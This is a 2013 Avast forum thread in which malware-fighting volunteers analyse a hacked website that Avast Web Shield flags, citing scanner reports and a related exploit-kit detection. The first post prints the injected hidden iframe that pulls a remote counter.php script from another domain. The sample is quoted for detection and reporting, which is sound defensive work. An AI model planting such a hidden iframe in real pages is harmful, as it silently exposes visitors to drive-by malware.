Author Topic: avast! Webshield detects JS:Iframe-DOI[Trj] on site.  (Read 1865 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
avast! Webshield detects JS:Iframe-DOI[Trj] on site.
« on: December 12, 2013, 01:45:25 PM »
Where detected: Up(nil):   unknown_html   ARIN   US   abuse at bluehost dot com   74.220.207.85    to 74.220.207.85   2yourplace dot com   htxp://mightyautopro.2yourplace.com/index.html
No detection here: http://urlquery.net/report.php?id=8345020
Flagged 6 x: https://www.virustotal.com/nl/url/b8cdaf7a8acb66bce1306113b1654309c1ad890a0048c9b7f7c30341aa1dd6ac/analysis/1386851578/
Suspicious on the iFrame check:
htxp://mightyautopro.2yourplace.com/fotopholder2_51/_cache/pictures/wall3.swf'
htxp://hotlineelectric.com/counter.php'
Suspicious on Injection check: text after HTML
<iframe src="htxp://hotlineelectric.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

This was found:   CMS: ezgenerator 3.0.55.9 (rainbow-v2[2])
http://www.metagenerator.info/generator-details.html?ggid=194

Verdict 100/100% malicious: http://zulu.zscaler.com/submission/show/8aee768fac85769efea8f7009de00708-1386852054

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: avast! Webshield detects JS:Iframe-DOI[Trj] on site.
« Reply #1 on: December 12, 2013, 02:31:04 PM »
there is also one previous detected redkit exploit kit / Malicious iframe on same IP   urlquery.net/report.php?id=2892259



« Last Edit: December 12, 2013, 02:37:10 PM by Pondus »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: avast! Webshield detects JS:Iframe-DOI[Trj] on site.
« Reply #2 on: December 12, 2013, 02:35:23 PM »
Hi Pondus,

Break that link please, because users with avast! Web Shield active get a block for a  JS:Iframe-DRH[Trj] detection,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!